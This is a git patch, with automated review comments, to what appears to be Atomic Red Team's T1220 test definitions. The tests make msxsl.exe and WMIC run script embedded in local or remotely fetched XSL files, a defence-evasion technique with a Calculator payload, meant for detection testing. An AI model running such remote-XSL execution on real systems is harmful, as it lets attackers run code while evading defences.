From decc37d1dce19e4b5899a65ca52db005ffb4bda6 Mon Sep 17 00:00:00 2001
From: JoustingZebra <80557158+JoustingZebra@users.noreply.github.com>
Date: Fri, 29 Oct 2021 18:18:18 -0400
Subject: [PATCH] Fix for MSXSL dependency issues Added: Fixes for "MSXSL Bypass using remote files" T1220/bin/ folder for default msxsl.exe filepath. Input argument for filepath to msxls.exe Cleanup command to remove msxls.exe Capitalization fixes for "-ErrorAction Ignore" Fixed spelling "successfully" on line 10, 60, and 121. Split line 57 to get length under 150 characters.
---
 atomics/T1220/T1220.yaml | 46 +++++++++++++++++++++++++++-----------
 1 file changed, 34 insertions(+), 12 deletions(-)
diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml
index 03936bd3..1656a3a4 100644
--- a/atomics/T1220/T1220.yaml
+++ b/atomics/T1220/T1220.yaml
@@ -5,8 +5,9 @@ atomic_tests:
 auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d
 description: |
 Executes the code specified within a XSL script tag during XSL transformation using a local payload.
- Requires download of MSXSL from Microsoft (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ).
- Open Calculator.exe when test sucessfully executed, while AV turned off.
+ Requires download of MSXSL. No longer available from Microsoft.
+ (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )
+ Open Calculator.exe when test successfully executed, while AV turned off.
 supported_platforms:
 - windows
 input_arguments:
@@ -18,6 +19,10 @@ atomic_tests:
 description: Location of the test XSL script file on the local filesystem.
 type: Path
 default: PathToAtomicsFolder\T1220\src\msxslscript.xsl
+ msxsl_exe:
+ description: Location of the MSXSL executable.
+ type: Path
+ default: PathToAtomicsFolder\T1220\bin\msxsl.exe
 dependency_executor_name: powershell
 dependencies:
 - description: |
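Review bot: The description of the new `msxsl_exe` argument only says where the executable lives, but with this patch that path is also where the prerequisite downloads the binary when it is missing and what `cleanup_command` deletes afterwards (both in the hunk that follows, which starts outside this one), and a reader choosing a value should know that. I would make it `description: Location of the MSXSL executable. Downloaded here by the prerequisite if missing and removed by the cleanup command.` The same argument is added again for the remote-files test later in the patch and should carry the same wording.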
@@ -25,31 +30,34 @@ atomic_tests:
 prereq_command: |
 if (Test-Path #{xmlfile}) {exit 0} else {exit 1}
 get_prereq_command: |
- New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null
+ New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}"
 - description: |
 XSL file must exist on disk at specified location (#{xslfile})
 prereq_command: |
 if (Test-Path #{xslfile}) {exit 0} else {exit 1}
 get_prereq_command: |
- New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null
+ New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}"
 - description: |
 msxsl.exe must exist on disk at specified location (#{msxsl_exe})
 prereq_command: |
 if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}
 get_prereq_command: |
- Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "$env:TEMP\msxsl.exe"
- Copy-Item $env:TEMP\msxsl.exe #{msxsl_exe} -Force
- Remove-Item $env:TEMP\msxsl.exe
+ Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}"
 executor:
 command: |
- C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
+ #{msxsl_exe} #{xmlfile} #{xslfile}
+ cleanup_command: |
+ Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore
 name: command_prompt
 - name: MSXSL Bypass using remote files
 auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
 description: |
- Executes the code specified within a XSL script tag during XSL transformation using a remote payload. 
Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
+ Executes the code specified within a XSL script tag during XSL transformation using a remote payload.
+ Requires download of MSXSL.exe. No longer available from Microsoft.
+ (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )
+ Open Calculator.exe when test successfully executed, while AV turned off.
 supported_platforms:
 - windows
 input_arguments:
@@ -61,9 +69,23 @@ atomic_tests:
 description: Remote location (URL) of the test XSL script file.
 type: Url
 default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
+ msxsl_exe:
+ description: Location of the MSXSL executable.
+ type: Path
+ default: PathToAtomicsFolder\T1220\bin\msxsl.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ msxsl.exe must exist on disk at specified location (#{msxsl_exe})
+ prereq_command: |
+ if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://web.archive.org/web/20200803205229/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}"
 executor:
 command: |
- C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
+ #{msxsl_exe} #{xmlfile} #{xslfile}
+ cleanup_command: |
+ Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore
 name: command_prompt
 - name: WMIC bypass using local XSL file
 auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
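Review bot: The rewritten `get_prereq_command` for msxsl.exe writes the download straight to `#{msxsl_exe}` but, unlike the two prerequisites above it in the same hunk, never creates the parent directory first; the new default lives under `T1220\bin\`, and although the commit message mentions adding that folder, the diffstat lists only the YAML file (git does not track empty directories), so on a fresh checkout `Invoke-WebRequest -OutFile` fails and the prerequisite can never be satisfied. Mirror the other entries by adding `New-Item -Type Directory (split-path #{msxsl_exe}) -ErrorAction Ignore | Out-Null` before the `Invoke-WebRequest` line. The binary is also fetched from web.archive.org and executed with no integrity check; comparing `(Get-FileHash "#{msxsl_exe}" -Algorithm SHA256).Hash` against a pinned value (placeholder: EXPECTED_MSXSL_SHA256) and removing the file on mismatch would catch a changed or tampered download. The dependency block duplicated for the remote-files test in the next hunk has both issues.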
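Review bot: The new `cleanup_command` removes whatever `#{msxsl_exe}` points at, so a user who sets the argument to an msxsl.exe they already had elsewhere loses that copy after one run, and with the default path every run re-downloads the binary from the archive; the same cleanup is added in the previous hunk. Either scope the removal to the copy the prerequisite fetched (for example only when the path is under PathToAtomicsFolder) or state in the argument description that the file is deleted on cleanup. The new dependency and executor also pass the path unquoted: `if (Test-Path "#{msxsl_exe}") {exit 0} else {exit 1}` and `"#{msxsl_exe}" #{xmlfile} #{xslfile}` would survive a path containing spaces.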
@@ -87,7 +109,7 @@ atomic_tests:
 prereq_command: |
 if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}
 get_prereq_command: |
- New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null
+ New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
 executor:
 command: |
@@ -96,7 +118,7 @@ atomic_tests:
 - name: WMIC bypass using remote XSL file
 auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b
 description: |
- Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off.
+ Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test successfully executed, while AV turned off.
 supported_platforms:
 - windows
 input_arguments: